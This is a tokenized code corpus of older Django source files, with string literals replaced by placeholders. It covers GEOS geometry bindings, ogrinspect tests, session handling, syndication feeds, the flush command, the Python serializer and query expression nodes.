'<STR_LIT>' ) , [ c_char_p ] ) <EOL> to_hex = bin_output ( GEOSFunc ( '<STR_LIT>' ) ) <EOL> to_wkb = bin_output ( GEOSFunc ( '<STR_LIT>' ) ) <EOL> to_wkt = string_from_geom ( GEOSFunc ( '<STR_LIT>' ) ) <EOL> geos_normalize = int_from_geom ( GEOSFunc ( '<STR_LIT>' ) ) <EOL> geos_type = string_from_geom ( GEOSFunc ( '<STR_LIT>' ) ) <EOL> geos_typeid = int_from_geom ( GEOSFunc ( '<STR_LIT>' ) ) <EOL> get_dims = int_from_geom ( GEOSFunc ( '<STR_LIT>' ) , zero = True ) <EOL> get_num_coords = int_from_geom ( GEOSFunc ( '<STR_LIT>' ) ) <EOL> get_num_geoms = int_from_geom ( GEOSFunc ( '<STR_LIT>' ) ) <EOL> create_point = geom_output ( GEOSFunc ( '<STR_LIT>' ) , [ CS_PTR ] ) <EOL> create_linestring = geom_output ( GEOSFunc ( '<STR_LIT>' ) , [ CS_PTR ] ) <EOL> create_linearring = geom_output ( GEOSFunc ( '<STR_LIT>' ) , [ CS_PTR ] ) <EOL> create_polygon = geom_output ( GEOSFunc ( '<STR_LIT>' ) , None ) <EOL> create_collection = geom_output ( GEOSFunc ( '<STR_LIT>' ) , None ) <EOL> get_extring = geom_output ( GEOSFunc ( '<STR_LIT>' ) , [ GEOM_PTR ] ) <EOL> get_intring = geom_index ( GEOSFunc ( '<STR_LIT>' ) ) <EOL> get_nrings = int_from_geom ( GEOSFunc ( '<STR_LIT>' ) ) <EOL> get_geomn = geom_index ( GEOSFunc ( '<STR_LIT>' ) ) <EOL> geom_clone = GEOSFunc ( '<STR_LIT>' ) <EOL> geom_clone . argtypes = [ GEOM_PTR ] <EOL> geom_clone . restype = GEOM_PTR <EOL> destroy_geom = GEOSFunc ( '<STR_LIT>' ) <EOL> destroy_geom . argtypes = [ GEOM_PTR ] <EOL> destroy_geom . restype = None <EOL> geos_get_srid = GEOSFunc ( '<STR_LIT>' ) <EOL> geos_get_srid . argtypes = [ GEOM_PTR ] <EOL> geos_get_srid . restype = c_int <EOL> geos_set_srid = GEOSFunc ( '<STR_LIT>' ) <EOL> geos_set_srid . argtypes = [ GEOM_PTR , c_int ] <EOL> geos_set_srid . restype = None </s>
<s> from __future__ import absolute_import <EOL> import os <EOL> from django . db import connections <EOL> from django . test import TestCase <EOL> from django . contrib . gis . gdal import Driver <EOL> from django . contrib . gis . geometry . test_data import TEST_DATA <EOL> from django . contrib . gis . utils . ogrinspect import ogrinspect <EOL> from . models import AllOGRFields <EOL> class OGRInspectTest ( TestCase ) : <EOL> def test_poly ( self ) : <EOL> shp_file = os . path . join ( TEST_DATA , '<STR_LIT>' , '<STR_LIT>' ) <EOL> model_def = ogrinspect ( shp_file , '<STR_LIT>' ) <EOL> expected = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> self . assertEqual ( model_def , '<STR_LIT:\n>' . join ( expected ) ) <EOL> def test_date_field ( self ) : <EOL> shp_file = os . path . join ( TEST_DATA , '<STR_LIT>' , '<STR_LIT>' ) <EOL> model_def = ogrinspect ( shp_file , '<STR_LIT>' ) <EOL> expected = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> self . assertEqual ( model_def , '<STR_LIT:\n>' . join ( expected ) ) <EOL> def test_time_field ( self ) : <EOL> if not connections [ '<STR_LIT:default>' ] . ops . postgis : <EOL> return <EOL> ogr_db = get_ogr_db_string ( ) <EOL> if not ogr_db : <EOL> return <EOL> model_def = ogrinspect ( ogr_db , '<STR_LIT>' , <EOL> layer_key = AllOGRFields . _meta . db_table , <EOL> decimal = [ '<STR_LIT>' ] ) <EOL> expected = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> self . assertEqual ( model_def , '<STR_LIT:\n>' . join ( expected ) ) <EOL> def get_ogr_db_string ( ) : <EOL> db = connections . databases [ '<STR_LIT:default>' ] <EOL> drivers = { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> } <EOL> drv_name , db_str = drivers [ db [ '<STR_LIT>' ] ] <EOL> try : <EOL> Driver ( drv_name ) <EOL> except : <EOL> return None <EOL> params = [ "<STR_LIT>" % db [ '<STR_LIT>' ] ] <EOL> def add ( key , template ) : <EOL> value = db . get ( key , None ) <EOL> if value : <EOL> params . append ( template % value ) <EOL> add ( '<STR_LIT>' , "<STR_LIT>" ) <EOL> add ( '<STR_LIT>' , "<STR_LIT>" ) <EOL> add ( '<STR_LIT>' , "<STR_LIT>" ) <EOL> add ( '<STR_LIT>' , "<STR_LIT>" ) <EOL> return '<STR_LIT>' % ( db_str , '<STR_LIT:U+0020>' . join ( params ) ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> from django . contrib . localflavor . py . py_department import DEPARTMENT_CHOICES , DEPARTMENT_ROMAN_CHOICES <EOL> from django . forms . fields import Select <EOL> class PyDepartmentSelect ( Select ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , attrs = None ) : <EOL> super ( PyDepartmentSelect , self ) . __init__ ( attrs , choices = DEPARTMENT_CHOICES ) <EOL> class PyNumberedDepartmentSelect ( Select ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , attrs = None ) : <EOL> super ( PyNumberedDepartmentSelect , self ) . __init__ ( attrs , choices = DEPARTMENT_ROMAN_CHOICES ) </s>
<s> import base64 <EOL> import time <EOL> from datetime import datetime , timedelta <EOL> try : <EOL> import cPickle as pickle <EOL> except ImportError : <EOL> import pickle <EOL> from django . conf import settings <EOL> from django . core . exceptions import SuspiciousOperation <EOL> from django . utils . crypto import constant_time_compare <EOL> from django . utils . crypto import get_random_string <EOL> from django . utils . crypto import salted_hmac <EOL> from django . utils import timezone <EOL> class CreateError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class SessionBase ( object ) : <EOL> """<STR_LIT>""" <EOL> TEST_COOKIE_NAME = '<STR_LIT>' <EOL> TEST_COOKIE_VALUE = '<STR_LIT>' <EOL> def __init__ ( self , session_key = None ) : <EOL> self . _session_key = session_key <EOL> self . accessed = False <EOL> self . modified = False <EOL> def __contains__ ( self , key ) : <EOL> return key in self . _session <EOL> def __getitem__ ( self , key ) : <EOL> return self . _session [ key ] <EOL> def __setitem__ ( self , key , value ) : <EOL> self . _session [ key ] = value <EOL> self . modified = True <EOL> def __delitem__ ( self , key ) : <EOL> del self . _session [ key ] <EOL> self . modified = True <EOL> def get ( self , key , default = None ) : <EOL> return self . _session . get ( key , default ) <EOL> def pop ( self , key , * args ) : <EOL> self . modified = self . modified or key in self . _session <EOL> return self . _session . pop ( key , * args ) <EOL> def setdefault ( self , key , value ) : <EOL> if key in self . _session : <EOL> return self . _session [ key ] <EOL> else : <EOL> self . modified = True <EOL> self . _session [ key ] = value <EOL> return value <EOL> def set_test_cookie ( self ) : <EOL> self [ self . TEST_COOKIE_NAME ] = self . TEST_COOKIE_VALUE <EOL> def test_cookie_worked ( self ) : <EOL> return self . get ( self . TEST_COOKIE_NAME ) == self . TEST_COOKIE_VALUE <EOL> def delete_test_cookie ( self ) : <EOL> del self [ self . TEST_COOKIE_NAME ] <EOL> def _hash ( self , value ) : <EOL> key_salt = "<STR_LIT>" + self . __class__ . __name__ <EOL> return salted_hmac ( key_salt , value ) . hexdigest ( ) <EOL> def encode ( self , session_dict ) : <EOL> "<STR_LIT>" <EOL> pickled = pickle . dumps ( session_dict , pickle . HIGHEST_PROTOCOL ) <EOL> hash = self . _hash ( pickled ) <EOL> return base64 . encodestring ( hash + "<STR_LIT::>" + pickled ) <EOL> def decode ( self , session_data ) : <EOL> encoded_data = base64 . decodestring ( session_data ) <EOL> try : <EOL> hash , pickled = encoded_data . split ( '<STR_LIT::>' , <NUM_LIT:1> ) <EOL> expected_hash = self . _hash ( pickled ) <EOL> if not constant_time_compare ( hash , expected_hash ) : <EOL> raise SuspiciousOperation ( "<STR_LIT>" ) <EOL> else : <EOL> return pickle . loads ( pickled ) <EOL> except Exception : <EOL> return { } <EOL> def update ( self , dict_ ) : <EOL> self . _session . update ( dict_ ) <EOL> self . modified = True <EOL> def has_key ( self , key ) : <EOL> return key in self . _session <EOL> def keys ( self ) : <EOL> return self . _session . keys ( ) <EOL> def values ( self ) : <EOL> return self . _session . values ( ) <EOL> def items ( self ) : <EOL> return self . _session . items ( ) <EOL> def iterkeys ( self ) : <EOL> return self . _session . iterkeys ( ) <EOL> def itervalues ( self ) : <EOL> return self . _session . itervalues ( ) <EOL> def iteritems ( self ) : <EOL> return self . _session . iteritems ( ) <EOL> def clear ( self ) : <EOL> self . _session_cache = { } <EOL> self . accessed = True <EOL> self . modified = True <EOL> def _get_new_session_key ( self ) : <EOL> "<STR_LIT>" <EOL> hex_chars = '<STR_LIT>' <EOL> while True : <EOL> session_key = get_random_string ( <NUM_LIT:32> , hex_chars ) <EOL> if not self . exists ( session_key ) : <EOL> break <EOL> return session_key <EOL> def _get_or_create_session_key ( self ) : <EOL> if self . _session_key is None : <EOL> self . _session_key = self . _get_new_session_key ( ) <EOL> return self . _session_key <EOL> def _get_session_key ( self ) : <EOL> return self . _session_key <EOL> session_key = property ( _get_session_key ) <EOL> def _get_session ( self , no_load = False ) : <EOL> """<STR_LIT>""" <EOL> self . accessed = True <EOL> try : <EOL> return self . _session_cache <EOL> except AttributeError : <EOL> if self . session_key is None or no_load : <EOL> self . _session_cache = { } <EOL> else : <EOL> self . _session_cache = self . load ( ) <EOL> return self . _session_cache <EOL> _session = property ( _get_session ) <EOL> def get_expiry_age ( self ) : <EOL> """<STR_LIT>""" <EOL> expiry = self . get ( '<STR_LIT>' ) <EOL> if not expiry : <EOL> return settings . SESSION_COOKIE_AGE <EOL> if not isinstance ( expiry , datetime ) : <EOL> return expiry <EOL> delta = expiry - timezone . now ( ) <EOL> return delta . days * <NUM_LIT> + delta . seconds <EOL> def get_expiry_date ( self ) : <EOL> """<STR_LIT>""" <EOL> expiry = self . get ( '<STR_LIT>' ) <EOL> if isinstance ( expiry , datetime ) : <EOL> return expiry <EOL> if not expiry : <EOL> expiry = settings . SESSION_COOKIE_AGE <EOL> return timezone . now ( ) + timedelta ( seconds = expiry ) <EOL> def set_expiry ( self , value ) : <EOL> """<STR_LIT>""" <EOL> if value is None : <EOL> try : <EOL> del self [ '<STR_LIT>' ] <EOL> except KeyError : <EOL> pass <EOL> return <EOL> if isinstance ( value , timedelta ) : <EOL> value = timezone . now ( ) + value <EOL> self [ '<STR_LIT>' ] = value <EOL> def get_expire_at_browser_close ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . get ( '<STR_LIT>' ) is None : <EOL> return settings . SESSION_EXPIRE_AT_BROWSER_CLOSE <EOL> return self . get ( '<STR_LIT>' ) == <NUM_LIT:0> <EOL> def flush ( self ) : <EOL> """<STR_LIT>""" <EOL> self . clear ( ) <EOL> self . delete ( ) <EOL> self . create ( ) <EOL> def cycle_key ( self ) : <EOL> """<STR_LIT>""" <EOL> data = self . _session_cache <EOL> key = self . session_key <EOL> self . create ( ) <EOL> self . _session_cache = data <EOL> self . delete ( key ) <EOL> def exists ( self , session_key ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def create ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def save ( self , must_create = False ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def delete ( self , session_key = None ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def load ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError </s>
<s> from django . conf import settings <EOL> from django . contrib . sites . models import get_current_site <EOL> from django . core . exceptions import ImproperlyConfigured , ObjectDoesNotExist <EOL> from django . http import HttpResponse , Http404 <EOL> from django . template import loader , TemplateDoesNotExist , RequestContext <EOL> from django . utils import feedgenerator , tzinfo <EOL> from django . utils . encoding import force_unicode , iri_to_uri , smart_unicode <EOL> from django . utils . html import escape <EOL> from django . utils . timezone import is_naive <EOL> def add_domain ( domain , url , secure = False ) : <EOL> protocol = '<STR_LIT>' if secure else '<STR_LIT:http>' <EOL> if url . startswith ( '<STR_LIT>' ) : <EOL> url = '<STR_LIT>' % ( protocol , url ) <EOL> elif not ( url . startswith ( '<STR_LIT>' ) <EOL> or url . startswith ( '<STR_LIT>' ) <EOL> or url . startswith ( '<STR_LIT>' ) ) : <EOL> url = iri_to_uri ( u'<STR_LIT>' % ( protocol , domain , url ) ) <EOL> return url <EOL> class FeedDoesNotExist ( ObjectDoesNotExist ) : <EOL> pass <EOL> class Feed ( object ) : <EOL> feed_type = feedgenerator . DefaultFeed <EOL> title_template = None <EOL> description_template = None <EOL> def __call__ ( self , request , * args , ** kwargs ) : <EOL> try : <EOL> obj = self . get_object ( request , * args , ** kwargs ) <EOL> except ObjectDoesNotExist : <EOL> raise Http404 ( '<STR_LIT>' ) <EOL> feedgen = self . get_feed ( obj , request ) <EOL> response = HttpResponse ( content_type = feedgen . mime_type ) <EOL> feedgen . write ( response , '<STR_LIT:utf-8>' ) <EOL> return response <EOL> def item_title ( self , item ) : <EOL> return escape ( force_unicode ( item ) ) <EOL> def item_description ( self , item ) : <EOL> return force_unicode ( item ) <EOL> def item_link ( self , item ) : <EOL> try : <EOL> return item . get_absolute_url ( ) <EOL> except AttributeError : <EOL> raise ImproperlyConfigured ( '<STR_LIT>' % item . __class__ . __name__ ) <EOL> def __get_dynamic_attr ( self , attname , obj , default = None ) : <EOL> try : <EOL> attr = getattr ( self , attname ) <EOL> except AttributeError : <EOL> return default <EOL> if callable ( attr ) : <EOL> if hasattr ( attr , '<STR_LIT>' ) : <EOL> argcount = attr . func_code . co_argcount <EOL> else : <EOL> argcount = attr . __call__ . func_code . co_argcount <EOL> if argcount == <NUM_LIT:2> : <EOL> return attr ( obj ) <EOL> else : <EOL> return attr ( ) <EOL> return attr <EOL> def feed_extra_kwargs ( self , obj ) : <EOL> """<STR_LIT>""" <EOL> return { } <EOL> def item_extra_kwargs ( self , item ) : <EOL> """<STR_LIT>""" <EOL> return { } <EOL> def get_object ( self , request , * args , ** kwargs ) : <EOL> return None <EOL> def get_feed ( self , obj , request ) : <EOL> """<STR_LIT>""" <EOL> current_site = get_current_site ( request ) <EOL> link = self . __get_dynamic_attr ( '<STR_LIT>' , obj ) <EOL> link = add_domain ( current_site . domain , link , request . is_secure ( ) ) <EOL> feed = self . feed_type ( <EOL> title = self . __get_dynamic_attr ( '<STR_LIT:title>' , obj ) , <EOL> subtitle = self . __get_dynamic_attr ( '<STR_LIT>' , obj ) , <EOL> link = link , <EOL> description = self . __get_dynamic_attr ( '<STR_LIT:description>' , obj ) , <EOL> language = settings . LANGUAGE_CODE . decode ( ) , <EOL> feed_url = add_domain ( <EOL> current_site . domain , <EOL> self . __get_dynamic_attr ( '<STR_LIT>' , obj ) or request . path , <EOL> request . is_secure ( ) , <EOL> ) , <EOL> author_name = self . __get_dynamic_attr ( '<STR_LIT>' , obj ) , <EOL> author_link = self . __get_dynamic_attr ( '<STR_LIT>' , obj ) , <EOL> author_email = self . __get_dynamic_attr ( '<STR_LIT>' , obj ) , <EOL> categories = self . __get_dynamic_attr ( '<STR_LIT>' , obj ) , <EOL> feed_copyright = self . __get_dynamic_attr ( '<STR_LIT>' , obj ) , <EOL> feed_guid = self . __get_dynamic_attr ( '<STR_LIT>' , obj ) , <EOL> ttl = self . __get_dynamic_attr ( '<STR_LIT>' , obj ) , <EOL> ** self . feed_extra_kwargs ( obj ) <EOL> ) <EOL> title_tmp = None <EOL> if self . title_template is not None : <EOL> try : <EOL> title_tmp = loader . get_template ( self . title_template ) <EOL> except TemplateDoesNotExist : <EOL> pass <EOL> description_tmp = None <EOL> if self . description_template is not None : <EOL> try : <EOL> description_tmp = loader . get_template ( self . description_template ) <EOL> except TemplateDoesNotExist : <EOL> pass <EOL> for item in self . __get_dynamic_attr ( '<STR_LIT>' , obj ) : <EOL> if title_tmp is not None : <EOL> title = title_tmp . render ( RequestContext ( request , { '<STR_LIT>' : item , '<STR_LIT>' : current_site } ) ) <EOL> else : <EOL> title = self . __get_dynamic_attr ( '<STR_LIT>' , item ) <EOL> if description_tmp is not None : <EOL> description = description_tmp . render ( RequestContext ( request , { '<STR_LIT>' : item , '<STR_LIT>' : current_site } ) ) <EOL> else : <EOL> description = self . __get_dynamic_attr ( '<STR_LIT>' , item ) <EOL> link = add_domain ( <EOL> current_site . domain , <EOL> self . __get_dynamic_attr ( '<STR_LIT>' , item ) , <EOL> request . is_secure ( ) , <EOL> ) <EOL> enc = None <EOL> enc_url = self . __get_dynamic_attr ( '<STR_LIT>' , item ) <EOL> if enc_url : <EOL> enc = feedgenerator . Enclosure ( <EOL> url = smart_unicode ( enc_url ) , <EOL> length = smart_unicode ( self . __get_dynamic_attr ( '<STR_LIT>' , item ) ) , <EOL> mime_type = smart_unicode ( self . __get_dynamic_attr ( '<STR_LIT>' , item ) ) <EOL> ) <EOL> author_name = self . __get_dynamic_attr ( '<STR_LIT>' , item ) <EOL> if author_name is not None : <EOL> author_email = self . __get_dynamic_attr ( '<STR_LIT>' , item ) <EOL> author_link = self . __get_dynamic_attr ( '<STR_LIT>' , item ) <EOL> else : <EOL> author_email = author_link = None <EOL> pubdate = self . __get_dynamic_attr ( '<STR_LIT>' , item ) <EOL> if pubdate and is_naive ( pubdate ) : <EOL> ltz = tzinfo . LocalTimezone ( pubdate ) <EOL> pubdate = pubdate . replace ( tzinfo = ltz ) <EOL> feed . add_item ( <EOL> title = title , <EOL> link = link , <EOL> description = description , <EOL> unique_id = self . __get_dynamic_attr ( '<STR_LIT>' , item , link ) , <EOL> enclosure = enc , <EOL> pubdate = pubdate , <EOL> author_name = author_name , <EOL> author_email = author_email , <EOL> author_link = author_link , <EOL> categories = self . __get_dynamic_attr ( '<STR_LIT>' , item ) , <EOL> item_copyright = self . __get_dynamic_attr ( '<STR_LIT>' , item ) , <EOL> ** self . item_extra_kwargs ( item ) <EOL> ) <EOL> return feed </s>
<s> from optparse import make_option <EOL> from django . conf import settings <EOL> from django . db import connections , router , transaction , models , DEFAULT_DB_ALIAS <EOL> from django . core . management import call_command <EOL> from django . core . management . base import NoArgsCommand , CommandError <EOL> from django . core . management . color import no_style <EOL> from django . core . management . sql import sql_flush , emit_post_sync_signal <EOL> from django . utils . importlib import import_module <EOL> class Command ( NoArgsCommand ) : <EOL> option_list = NoArgsCommand . option_list + ( <EOL> make_option ( '<STR_LIT>' , action = '<STR_LIT>' , dest = '<STR_LIT>' , default = True , <EOL> help = '<STR_LIT>' ) , <EOL> make_option ( '<STR_LIT>' , action = '<STR_LIT:store>' , dest = '<STR_LIT>' , <EOL> default = DEFAULT_DB_ALIAS , help = '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> ) <EOL> help = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def handle_noargs ( self , ** options ) : <EOL> db = options . get ( '<STR_LIT>' ) <EOL> connection = connections [ db ] <EOL> verbosity = int ( options . get ( '<STR_LIT>' ) ) <EOL> interactive = options . get ( '<STR_LIT>' ) <EOL> self . style = no_style ( ) <EOL> for app_name in settings . INSTALLED_APPS : <EOL> try : <EOL> import_module ( '<STR_LIT>' , app_name ) <EOL> except ImportError : <EOL> pass <EOL> sql_list = sql_flush ( self . style , connection , only_django = True ) <EOL> if interactive : <EOL> confirm = raw_input ( """<STR_LIT>""" % connection . settings_dict [ '<STR_LIT>' ] ) <EOL> else : <EOL> confirm = '<STR_LIT:yes>' <EOL> if confirm == '<STR_LIT:yes>' : <EOL> try : <EOL> cursor = connection . cursor ( ) <EOL> for sql in sql_list : <EOL> cursor . execute ( sql ) <EOL> except Exception , e : <EOL> transaction . rollback_unless_managed ( using = db ) <EOL> raise CommandError ( """<STR_LIT>""" % ( connection . settings_dict [ '<STR_LIT>' ] , e ) ) <EOL> transaction . commit_unless_managed ( using = db ) <EOL> all_models = [ ] <EOL> for app in models . get_apps ( ) : <EOL> all_models . extend ( [ <EOL> m for m in models . get_models ( app , include_auto_created = True ) <EOL> if router . allow_syncdb ( db , m ) <EOL> ] ) <EOL> emit_post_sync_signal ( set ( all_models ) , verbosity , interactive , db ) <EOL> kwargs = options . copy ( ) <EOL> kwargs [ '<STR_LIT>' ] = db <EOL> call_command ( '<STR_LIT>' , '<STR_LIT>' , ** kwargs ) <EOL> else : <EOL> print "<STR_LIT>" </s>
<s> """<STR_LIT>""" <EOL> from django . conf import settings <EOL> from django . core . serializers import base <EOL> from django . db import models , DEFAULT_DB_ALIAS <EOL> from django . utils . encoding import smart_unicode , is_protected_type <EOL> class Serializer ( base . Serializer ) : <EOL> """<STR_LIT>""" <EOL> internal_use_only = True <EOL> def start_serialization ( self ) : <EOL> self . _current = None <EOL> self . objects = [ ] <EOL> def end_serialization ( self ) : <EOL> pass <EOL> def start_object ( self , obj ) : <EOL> self . _current = { } <EOL> def end_object ( self , obj ) : <EOL> self . objects . append ( { <EOL> "<STR_LIT>" : smart_unicode ( obj . _meta ) , <EOL> "<STR_LIT>" : smart_unicode ( obj . _get_pk_val ( ) , strings_only = True ) , <EOL> "<STR_LIT>" : self . _current <EOL> } ) <EOL> self . _current = None <EOL> def handle_field ( self , obj , field ) : <EOL> value = field . _get_val_from_obj ( obj ) <EOL> if is_protected_type ( value ) : <EOL> self . _current [ field . name ] = value <EOL> else : <EOL> self . _current [ field . name ] = field . value_to_string ( obj ) <EOL> def handle_fk_field ( self , obj , field ) : <EOL> if self . use_natural_keys and hasattr ( field . rel . to , '<STR_LIT>' ) : <EOL> related = getattr ( obj , field . name ) <EOL> if related : <EOL> value = related . natural_key ( ) <EOL> else : <EOL> value = None <EOL> else : <EOL> value = getattr ( obj , field . get_attname ( ) ) <EOL> self . _current [ field . name ] = value <EOL> def handle_m2m_field ( self , obj , field ) : <EOL> if field . rel . through . _meta . auto_created : <EOL> if self . use_natural_keys and hasattr ( field . rel . to , '<STR_LIT>' ) : <EOL> m2m_value = lambda value : value . natural_key ( ) <EOL> else : <EOL> m2m_value = lambda value : smart_unicode ( value . _get_pk_val ( ) , strings_only = True ) <EOL> self . _current [ field . name ] = [ m2m_value ( related ) <EOL> for related in getattr ( obj , field . name ) . iterator ( ) ] <EOL> def getvalue ( self ) : <EOL> return self . objects <EOL> def Deserializer ( object_list , ** options ) : <EOL> """<STR_LIT>""" <EOL> db = options . pop ( '<STR_LIT>' , DEFAULT_DB_ALIAS ) <EOL> models . get_apps ( ) <EOL> for d in object_list : <EOL> Model = _get_model ( d [ "<STR_LIT>" ] ) <EOL> data = { Model . _meta . pk . attname : Model . _meta . pk . to_python ( d [ "<STR_LIT>" ] ) } <EOL> m2m_data = { } <EOL> for ( field_name , field_value ) in d [ "<STR_LIT>" ] . iteritems ( ) : <EOL> if isinstance ( field_value , str ) : <EOL> field_value = smart_unicode ( field_value , options . get ( "<STR_LIT>" , settings . DEFAULT_CHARSET ) , strings_only = True ) <EOL> field = Model . _meta . get_field ( field_name ) <EOL> if field . rel and isinstance ( field . rel , models . ManyToManyRel ) : <EOL> if hasattr ( field . rel . to . _default_manager , '<STR_LIT>' ) : <EOL> def m2m_convert ( value ) : <EOL> if hasattr ( value , '<STR_LIT>' ) : <EOL> return field . rel . to . _default_manager . db_manager ( db ) . get_by_natural_key ( * value ) . pk <EOL> else : <EOL> return smart_unicode ( field . rel . to . _meta . pk . to_python ( value ) ) <EOL> else : <EOL> m2m_convert = lambda v : smart_unicode ( field . rel . to . _meta . pk . to_python ( v ) ) <EOL> m2m_data [ field . name ] = [ m2m_convert ( pk ) for pk in field_value ] <EOL> elif field . rel and isinstance ( field . rel , models . ManyToOneRel ) : <EOL> if field_value is not None : <EOL> if hasattr ( field . rel . to . _default_manager , '<STR_LIT>' ) : <EOL> if hasattr ( field_value , '<STR_LIT>' ) : <EOL> obj = field . rel . to . _default_manager . db_manager ( db ) . get_by_natural_key ( * field_value ) <EOL> value = getattr ( obj , field . rel . field_name ) <EOL> if field . rel . to . _meta . pk . rel : <EOL> value = value . pk <EOL> else : <EOL> value = field . rel . to . _meta . get_field ( field . rel . field_name ) . to_python ( field_value ) <EOL> data [ field . attname ] = value <EOL> else : <EOL> data [ field . attname ] = field . rel . to . _meta . get_field ( field . rel . field_name ) . to_python ( field_value ) <EOL> else : <EOL> data [ field . attname ] = None <EOL> else : <EOL> data [ field . name ] = field . to_python ( field_value ) <EOL> yield base . DeserializedObject ( Model ( ** data ) , m2m_data ) <EOL> def _get_model ( model_identifier ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> Model = models . get_model ( * model_identifier . split ( "<STR_LIT:.>" ) ) <EOL> except TypeError : <EOL> Model = None <EOL> if Model is None : <EOL> raise base . DeserializationError ( u"<STR_LIT>" % model_identifier ) <EOL> return Model </s>
<s> import datetime <EOL> from django . utils import tree <EOL> class ExpressionNode ( tree . Node ) : <EOL> """<STR_LIT>""" <EOL> ADD = '<STR_LIT:+>' <EOL> SUB = '<STR_LIT:->' <EOL> MUL = '<STR_LIT:*>' <EOL> DIV = '<STR_LIT:/>' <EOL> MOD = '<STR_LIT>' <EOL> AND = '<STR_LIT:&>' <EOL> OR = '<STR_LIT:|>' <EOL> def __init__ ( self , children = None , connector = None , negated = False ) : <EOL> if children is not None and len ( children ) > <NUM_LIT:1> and connector is None : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> super ( ExpressionNode , self ) . __init__ ( children , connector , negated ) <EOL> def _combine ( self , other , connector , reversed , node = None ) : <EOL> if isinstance ( other , datetime . timedelta ) : <EOL> return DateModifierNode ( [ self , other ] , connector ) <EOL> if reversed : <EOL> obj = ExpressionNode ( [ other ] , connector ) <EOL> obj . add ( node or self , connector ) <EOL> else : <EOL> obj = node or ExpressionNode ( [ self ] , connector ) <EOL> obj . add ( other , connector ) <EOL> return obj <EOL> def prepare ( self , evaluator , query , allow_joins ) : <EOL> return evaluator . prepare_node ( self , query , allow_joins ) <EOL> def evaluate ( self , evaluator , qn , connection ) : <EOL> return evaluator . evaluate_node ( self , qn , connection ) <EOL> def __add__ ( self , other ) : <EOL> return self . _combine ( other , self . ADD , False ) <EOL> def __sub__ ( self , other ) : <EOL> return self . _combine ( other , self . SUB , False ) <EOL> def __mul__ ( self , other ) : <EOL> return self . _combine ( other , self . MUL , False ) <EOL> def __div__ ( self , other ) : <EOL> return self . _combine ( other , self . DIV , False ) <EOL> def __mod__ ( self , other ) : <EOL> return self . _combine ( other , self . MOD , False ) <EOL> def __and__ ( self , other ) : <EOL> return self . _combine ( other , self . AND , False ) <EOL> def __or__ ( self , other ) : <EOL> return self . _combine ( other , self . OR , False ) <EOL> def __radd__ ( self , other ) : <EOL> return self . _combine ( other , self . ADD , True ) <EOL> def __rsub__ ( self , other ) : <EOL> return self . _combine ( other , self . SUB , True ) <EOL> def __rmul__ ( self , other ) : <EOL> return self . _combine ( other , self . MUL , True ) <EOL> def __rdiv__ ( self , other ) : <EOL> return self . _combine ( other , self . DIV , True ) <EOL> def __rmod__ ( self , other ) : <EOL> return self . _combine ( other , self . MOD , True ) <EOL> def __rand__ ( self , other ) : <EOL> return self . _combine ( other , self . AND , True ) <EOL> def __ror__ ( self , other ) : <EOL> return self . _combine ( other , self . OR , True ) <EOL> def prepare_database_save ( self , unused ) : <EOL> return self <EOL> class F ( ExpressionNode ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name ) : <EOL> super ( F , self ) . __init__ ( None , None , False ) <EOL> self . name = name <EOL> def __deepcopy__ ( self , memodict ) : <EOL> obj = super ( F , self ) . __deepcopy__ ( memodict ) <EOL> obj . name = self . name <EOL> return obj <EOL> def prepare ( self , evaluator , query , allow_joins ) : <EOL> return evaluator . prepare_leaf ( self , query , allow_joins ) <EOL> def evaluate ( self , evaluator , qn , connection ) : <EOL> return evaluator . evaluate_leaf ( self , qn , connection ) <EOL> class DateModifierNode ( ExpressionNode ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , children , connector , negated = False ) : <EOL> if len ( children ) != <NUM_LIT:2> : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> if not isinstance ( children [ <NUM_LIT:1> ] , datetime . timedelta ) : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> if connector not in ( self . ADD , self . SUB ) : <EOL> raise TypeError ( '<STR_LIT>' % connector ) <EOL> super ( DateModifierNode , self ) . __init__ ( children , connector , negated ) <EOL> def evaluate ( self , evaluator , qn , connection ) : <EOL> return evaluator . evaluate_date_modifier_node ( self , qn , connection ) </s>
